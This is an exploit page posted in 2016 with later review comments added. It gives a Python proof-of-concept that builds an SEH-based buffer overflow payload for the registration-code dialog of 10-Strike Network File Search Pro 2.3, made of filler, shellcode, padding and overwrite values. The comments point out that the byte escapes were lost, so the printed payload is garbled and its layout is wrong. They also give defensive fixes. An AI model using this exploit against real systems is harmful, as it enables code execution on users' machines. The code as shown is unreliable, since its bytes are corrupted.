10-Strike Network File Search Pro 2.3 Buffer Overflow
Posted on 13 December 2016
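#!python
#####################################################################################
# Exploit title: 10-Strike Network File Search Pro 2.3 Registration code SEH exploit
# Date: 2016-12-10
# Vendor homepage: https://www.10-strike.com/network-file-search/help/pro.shtml
# Download: https://www.10-strike.com/network-file-search/network-file-search-pro.exe
# Tested on: Win7 SP1
# Author: malwrforensics
# Details: Help->Enter registration code... and paste the text from poc.txt
#####################################################################################
#
# Proof-of-concept generator: builds one long string and writes it to poc.txt.
# Per the author's header, the issue is an SEH-based buffer overflow reached by
# pasting that text into the application's registration-code dialog.
#
# NOTE(review): the string literals below are kept exactly as they appear on the
# page. The escape prefixes of what look like byte escapes seem to have been lost
# when the listing was extracted, so as printed these are plain ASCII text and the
# lengths derived from them do not reflect the author's intended layout.
#
# NOTE(review): the script presumably targets Python 2; under Python 3, writing a
# str to a file opened in 'wb' mode raises TypeError.
#
# Defensive takeaway: by the author's own layout the field accepts input thousands
# of characters long, far beyond any plausible registration code. Length validation
# on that input is the direct fix; SEH-overwrite mitigations (SafeSEH, SEHOP) are
# the relevant platform controls. Whether the tested build had them enabled is not
# stated on the page.


def write_poc(fname, buffer):
    """Write *buffer* to the file *fname* in binary mode.

    An existing file of the same name is truncated. The context manager
    guarantees the handle is closed even if the write raises, which the
    original open/write/close sequence did not.

    The parameter name ``buffer`` is kept for interface compatibility.
    """
    with open(fname, 'wb') as fhandle:
        fhandle.write(buffer)


fname="poc.txt"

# Leading filler: 0xfe0 repetitions of the author's padding token.
buf = 'x41' * 0xfe0

#########################
# Shellcode
# MessageBox ad infinitum
#########################
# The description above is the author's; the bytes are not decoded or verified here.
shellcode = ("x68x24x3Fx30x41x58x35x70x41x70"
             "x41x50x59x68x41x41x41x41x58x35"
             "x41x41x41x41x50x50x50x50x51xC3")

# Padding between the payload and the two trailing values.
junk = 'x41' * 0x5e

# The names 'jmp' and 'nseh' are the author's; the page does not explain which
# exception-record field each value is meant to overwrite.
jmp = 'xebx82x41x41'
nseh = 'xecx14x40x00'

# Final layout, in order: filler, payload, padding, then the two trailing values.
buffer = buf + shellcode + junk + jmp + nseh
write_poc(fname, buffer)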